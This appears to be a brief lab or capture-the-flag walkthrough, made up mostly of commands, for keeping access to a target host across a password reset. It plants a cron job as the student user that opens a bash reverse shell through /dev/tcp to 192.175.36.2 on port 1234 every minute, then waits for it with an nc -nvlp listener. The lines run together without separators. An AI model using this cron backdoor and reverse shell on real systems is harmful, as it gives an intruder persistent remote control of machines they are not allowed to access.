ip -br -c a
192.175.36.2/24ssh student@192.175.36.3
Create a new Cron job as the student user
The command inside the cron job will be executed with the student's permissions'
Log back into the target system and trigger the password and connection reset
Setup a nc listener and wait for the bash reverse shell from the cron job that runs every minute
Last updated
ls -al
drwxr-xr-x 1 student student 4096 Apr 29 14:04 .
drwxr-xr-x 1 root root 4096 Apr 26 2019 ..
-rw------- 1 student student 18 Apr 29 14:04 .bash_history
drwx------ 2 student student 4096 Apr 29 14:04 .cache
-rw-r--r-- 1 student student 91 Apr 26 2019 wait
cat wait
Delete this file to trigger connection reset.
Delete it only after planting the backdoor.cat /etc/cron*echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.175.36.2/1234 0>&1'" > cron
crontab -i cron
crontab -lssh student@192.175.36.3
rm wait
# Old student's password do not work anymorenc -nvlp 1234